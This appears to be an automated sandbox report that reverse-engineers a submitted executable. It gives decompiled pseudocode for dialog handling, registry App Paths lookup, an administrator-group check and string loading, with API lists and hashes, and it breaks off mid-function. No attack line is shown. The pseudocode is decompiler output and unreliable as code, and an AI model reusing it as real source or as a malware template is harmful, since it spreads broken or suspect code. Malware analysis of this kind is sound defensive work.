                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D35C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 010D35F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 010D35F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 010D3610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 010D3617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D3623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 010D3637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D3671
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2406144884-0
                                                                                                                                                                                                                                            • Opcode ID: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
                                                                                                                                                                                                                                            • Instruction ID: 136d5c9b1050aef816db2b6264793d6e65d5da7bbf0b208419ae267604c8ca81
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B3183B5241311FBD7701F39EC4DE6A3EA8F789B41F44851AFAC29A69CCB7A8400CB55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E010D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E010D658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E010D658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0x10d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E010D1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x010d2773
                                                                                                                                                                                                                                            0x010d277e
                                                                                                                                                                                                                                            0x010d2785
                                                                                                                                                                                                                                            0x010d278a
                                                                                                                                                                                                                                            0x010d278d
                                                                                                                                                                                                                                            0x010d2790
                                                                                                                                                                                                                                            0x010d2792
                                                                                                                                                                                                                                            0x010d2798
                                                                                                                                                                                                                                            0x010d279d
                                                                                                                                                                                                                                            0x010d28b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d27a3
                                                                                                                                                                                                                                            0x010d27a3
                                                                                                                                                                                                                                            0x010d27af
                                                                                                                                                                                                                                            0x010d27c2
                                                                                                                                                                                                                                            0x010d27c8
                                                                                                                                                                                                                                            0x010d27cd
                                                                                                                                                                                                                                            0x010d27d5
                                                                                                                                                                                                                                            0x010d28b7
                                                                                                                                                                                                                                            0x010d28b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d27db
                                                                                                                                                                                                                                            0x010d27dd
                                                                                                                                                                                                                                            0x010d28aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d27e3
                                                                                                                                                                                                                                            0x010d27e3
                                                                                                                                                                                                                                            0x010d27ec
                                                                                                                                                                                                                                            0x010d27f8
                                                                                                                                                                                                                                            0x010d2803
                                                                                                                                                                                                                                            0x010d280b
                                                                                                                                                                                                                                            0x010d2831
                                                                                                                                                                                                                                            0x010d28c3
                                                                                                                                                                                                                                            0x010d28c9
                                                                                                                                                                                                                                            0x010d28cd
                                                                                                                                                                                                                                            0x010d2837
                                                                                                                                                                                                                                            0x010d285a
                                                                                                                                                                                                                                            0x010d285c
                                                                                                                                                                                                                                            0x010d2865
                                                                                                                                                                                                                                            0x010d2892
                                                                                                                                                                                                                                            0x010d2895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2867
                                                                                                                                                                                                                                            0x010d2878
                                                                                                                                                                                                                                            0x010d288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d287a
                                                                                                                                                                                                                                            0x010d2880
                                                                                                                                                                                                                                            0x010d2885
                                                                                                                                                                                                                                            0x010d2897
                                                                                                                                                                                                                                            0x010d2899
                                                                                                                                                                                                                                            0x010d2899
                                                                                                                                                                                                                                            0x010d2878
                                                                                                                                                                                                                                            0x010d2865
                                                                                                                                                                                                                                            0x010d28a0
                                                                                                                                                                                                                                            0x010d28bf
                                                                                                                                                                                                                                            0x010d28c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d28c1
                                                                                                                                                                                                                                            0x010d2831
                                                                                                                                                                                                                                            0x010d27dd
                                                                                                                                                                                                                                            0x010d27d5
                                                                                                                                                                                                                                            0x010d28e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(C2F4ED82,00000000,00000000,00000000), ref: 010D27A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 010D27B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 010D27BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010D28AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D28B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010D27E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
                                                                                                                                                                                                                                            • Instruction ID: 32ffdc73c66ee06cae09b104275357cc36d8e4de1699c0b2b078d9b2e4730e08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941A071A01228AFDB259B64DC85AFABBBDEB15700F0040E9F9C9D3105DB758EC58FA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E010D18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x10d8128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E010D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E010D17EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0x10d8128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10d8128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x010d18a3
                                                                                                                                                                                                                                            0x010d18a3
                                                                                                                                                                                                                                            0x010d18ab
                                                                                                                                                                                                                                            0x010d18b2
                                                                                                                                                                                                                                            0x010d18b5
                                                                                                                                                                                                                                            0x010d18be
                                                                                                                                                                                                                                            0x010d18c0
                                                                                                                                                                                                                                            0x010d18c6
                                                                                                                                                                                                                                            0x010d18c7
                                                                                                                                                                                                                                            0x010d18ca
                                                                                                                                                                                                                                            0x010d18cf
                                                                                                                                                                                                                                            0x010d19c9
                                                                                                                                                                                                                                            0x010d19d8
                                                                                                                                                                                                                                            0x010d19d8
                                                                                                                                                                                                                                            0x010d18df
                                                                                                                                                                                                                                            0x010d19b8
                                                                                                                                                                                                                                            0x010d19bd
                                                                                                                                                                                                                                            0x010d19bf
                                                                                                                                                                                                                                            0x010d19bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d19bd
                                                                                                                                                                                                                                            0x010d18fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1912
                                                                                                                                                                                                                                            0x010d19aa
                                                                                                                                                                                                                                            0x010d19ad
                                                                                                                                                                                                                                            0x010d19b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1927
                                                                                                                                                                                                                                            0x010d1927
                                                                                                                                                                                                                                            0x010d1932
                                                                                                                                                                                                                                            0x010d1936
                                                                                                                                                                                                                                            0x010d19a9
                                                                                                                                                                                                                                            0x010d19a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d19a9
                                                                                                                                                                                                                                            0x010d194c
                                                                                                                                                                                                                                            0x010d19a2
                                                                                                                                                                                                                                            0x010d19a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d196e
                                                                                                                                                                                                                                            0x010d1970
                                                                                                                                                                                                                                            0x010d1999
                                                                                                                                                                                                                                            0x010d199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d199c
                                                                                                                                                                                                                                            0x010d1972
                                                                                                                                                                                                                                            0x010d1972
                                                                                                                                                                                                                                            0x010d1975
                                                                                                                                                                                                                                            0x010d1984
                                                                                                                                                                                                                                            0x010d1985
                                                                                                                                                                                                                                            0x010d198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d198c
                                                                                                                                                                                                                                            0x010d1991
                                                                                                                                                                                                                                            0x010d1996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1996
                                                                                                                                                                                                                                            0x010d194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010D18EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 010D18F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010D190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 010D1918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 010D192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010D1944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010D1964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 010D197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 010D199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D19A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D19AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
                                                                                                                                                                                                                                            • Instruction ID: 6bae62eb5225b5d0a6ced15905fb64f34ec08ba0edc856b1b233a80e48e89bc6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C313A71A0130AEFDB609FA9DC88AAFBFBCFF04300B104469FA85D2144DB369905CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x10d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x10d9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E010D1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
